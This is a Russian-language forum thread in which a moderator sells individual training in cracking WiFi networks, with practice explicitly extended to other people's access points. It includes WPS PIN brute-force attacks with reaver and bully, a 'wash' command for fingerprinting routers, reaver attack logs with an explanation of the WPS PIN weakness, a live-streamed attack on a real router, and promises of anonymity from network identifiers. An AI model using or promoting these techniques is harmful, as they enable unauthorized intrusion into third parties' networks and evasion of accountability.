Платно Индивидуальное обучение взлому WiFi. Теория и реальная совместная боевая практика.

Тема в разделе "Взлом. Блокировка. Удаление данных.", создана пользователем Rumzon, 6 янв 2018.

  1. Rumzon

    Rumzon Moder Модератор форума

    Индивидуальное обучение взлому WiFi. Теория и реальная совместная боевая практика.

    В обучение входит:


    1. Основы стандарта связи 802.11
    2. Тактики взлома
    3. Освоение всех систем вооружения и защиты
    4. Практика - работа на своей, а затем и чужих точках.
    5. Экзаменационная работа - самостоятельный взлом точки без моих подсказок.

    От вас нужна любая система линукс и боевой адаптер. Адаптеры должны быть на чипсетах Athreros AR9271 или Ralink RT2870/RT3070. Идеальные варианты TP-LINK TL-WN722N (только ревизия v1.0!) или ALFA AWUS036NH (только оригинальная тайваньская!). Тп-линки часто есть на авито - лохи не понимают насколько редкая первая ревизия и торгуют их всего за 200-300 рублей. Но продаются они быстро конечно же. Если нет линукса и/или подскажу где и как найти/настроить - без дополнительной платы.

    Результатом считаем 2 взятых точки.

    Освоение этой тактики даст вам уникальный уровень защиты - полное отсутствие таких сетевых идентификаторов как IP и MAC адреса, IMEI, IMSI и серийный номер симки и прочих. Вы станете сетевым призраком. Исчезните с радаров. Stealth mode engaged.


     
  2. Только с Кали Линкс работать будет ?
     
  3. Rumzon

    Rumzon Moder Модератор форума

    Ioop сказал(а):
    Только с Кали Линкс работать будет ?
    Нажмите, чтобы раскрыть...​
    kali linux, parrot security, wifislax, blackarch, tails, ubuntu, mint и дебиан я лично обкатывал - любая подойдет. но! в кали и пэрроте ривер 1.6.3 - самый свежий и в репозиториях полный фарш. в "гражданских" дистрибутивах нет evil twin пушек. а они важная часть комплекса. хотя полуавтомат wifite точно есть в минте - вот час назад буквально чекал.


     
  4. Rumzon

    Rumzon Moder Модератор форума

    Боевые адаптеры вот такие подойдут (пока без обзора просто картинки):

    1. ALFA Network AWUS036NH - мак у оригинала начинается на 00:C0:CA:XX:XX:XX (сгорела как последняя паскуда не отработав и месяца)

    [​IMG]


    (так же прокатит AWUS036NHA - но она на Atheros AR9271 как и тплинк ниже)

    2. TP-LINK TL-WN722N v1.0 (уже пол года у меня - стоковая антенна однозначно херня - с восьмеркой норм лупит)

    [​IMG]

    3. BLUEWAY N9000 - китайский ноу-нейм на чипсете ralink 3070. (Недавно купил случайно, еще пристрелку не прошел. но лупит дальше тплинка однозначно).
    [​IMG]

    "ствол" нужен как минимум вот такой (есть в наличии во всех лабазах с электроникой):

    [​IMG]
    Последнее редактирование: 9 янв 2018


     
  5. Rumzon

    Rumzon Moder Модератор форума

    Атака на точку (брутфорс wps пина) с помощью bully. Секвентальный перебор:




     
  6. Rumzon

    Rumzon Moder Модератор форума

    Раскрошил очередной тп-линк 941

    вот такой:

    [​IMG]
    Рис. 1 - фуфлоточка, не покупайте такие.

    На заметку: узнать модель точки доступа можно командой

    Код:
    sudo wash -i wlan0mon -j
    далее ищем в дампе мак адрес, а после него вот это:

    "wps_manufacturer" : "TP-LINK", "wps_model_name" : "TL-WR941N", "wps_model_number" : "2.0"


    Впервые атаковал с помощью bully - аналог reaver. Основной его плюс - два режима брутфоса пина - секвентальный и рэндомный. Первый шлепает по-порядку от нулей до девяток и не очень радует когда пин1 начинается с большой цифры. Второй же перебирает произвольно.


    Так же впервые работал с новой антенной (обзор балли и тарелки на днях запилю):
     
  7. Rumzon

    Rumzon Moder Модератор форума

    А китайцы то эти. Мало мало могут однако:

    [​IMG]

    заявлено 3 ватта, тогда как у альфы 036nh всего два. как привезут мне такой проверим.


     
  8. Rumzon

    Rumzon Moder Модератор форума

    В чатике в данный момент веду онлайн трансляцию атаки на вот такой вот девайс

    [​IMG]

    атака - брутфорс wps пина
    брутфорсер - reaver 1.6.4 c опциями -N -A -S и паралельной аутентификацей через aireplay
    адаптер blueway n9000
    антенна tplink ant2409a


    Последнее редактирование: 22 янв 2018


     
  9. Rumzon

    Rumzon Moder Модератор форума

    WarTech сказал(а):
    В чатике в данный момент веду онлайн трансляцию атаки на вот такой вот девайс

    [​IMG]

    атака - брутфорс wps пина
    брутфорсер - reaver 1.6.4 c опциями -N -A -S и паралельной аутентификацей через aireplay
    адаптер blueway n9000
    антенна tplink ant2409a


    Нажмите, чтобы раскрыть...​
    Та даааааам!



    опять риверу пришлось перебирать до 32% до прыжка на 91%. вот этот момент:

    Код:
    [+] Sending WSC NACK
    [+] Trying pin "35185673"
    [+] Sending authentication request
    [+] Sending association request
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: xxx)
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received WSC NACK
    [+] 32.06% complete @ 2018-01-21 23:38:03 (10 seconds/pin)
    [+] Trying pin "35215677"
    ^ это последняя попытка подбора пина1 - обратите внимание как адаптер и точка обмениваются пакетам в ходе процесса аутентификации через wps pin

    1. мы получаем сообщение м1 (видимо это запрос типа "скажи как мне пинкод вася")
    2. мы отправляем сообщение м2 (я так понял это проверка пин1 т.е. 3518xxxx)
    3. мы получаем сообщение м3 (по ходу это отказ на пин1 мол неверно)
    4. мы посылаем сообщение м4 (проверка пина2 т.е. хххх5673)
    5. мы снова получаем сообщение м3 (пин2 тоже неверный)
    6. закрывается сессия (NACK - Negative ACK)

    Код:
    [+] Sending WSC NACK
    [+] Trying pin "35213338"
    [+] Sending authentication request
    [+] Sending association request
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: xxx)
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received WSC NACK
    [+] 91.10% complete @ 2018-01-21 23:39:30 (5 seconds/pin)
    [+] Trying pin "35210122"
    ^ а это первая удачная попытка подбора пин1 и неудачная пин2 после запроса пин1 мы посылаем м2 и вместо отказа получаем запрос на пин2 (м1 + м3) таким образом ривер делает вывод что раз мы получили запрос на пин2 значит пин1 верный, а при подборе пин1 процесс выполнения сразу переваливает за 90%.

    вот на этой недоработке проектировщиков и построены атаки на впс пин. если бы он был монолитным пином из 8 знаков его нужно было бы взламывать сотни или тысячи лет. так и было запланировано. но по факту есть всего лишь 11 000 пинкодов. даже если роутер будет каждую попытку блокировать впс на 60 секунд (одна из стратегий защиты) - то на взлом тиакой точки нужно чуть менее 7 суток. Данную же точку я работал со скорострельностью 5-7 секунд на пин. На взлом ушло около 6-7 часов чистого времени.

     
  10. Rumzon

    Rumzon Moder Модератор форума



    видео к новому гайду "стратегии защиты роутеров" - wps lockout


     
  11. Rumzon

    Rumzon Moder Модератор форума

    Сегодня я на практических примерах покажу почему не стоит покупать роутеры таких производителей как TP-LINK и D-LINK, а так же работу через уязвимость в WPS на дальних и сверхдальних дистанциях. Напомню что вся движуха будет тут -


     

Поделиться этой страницей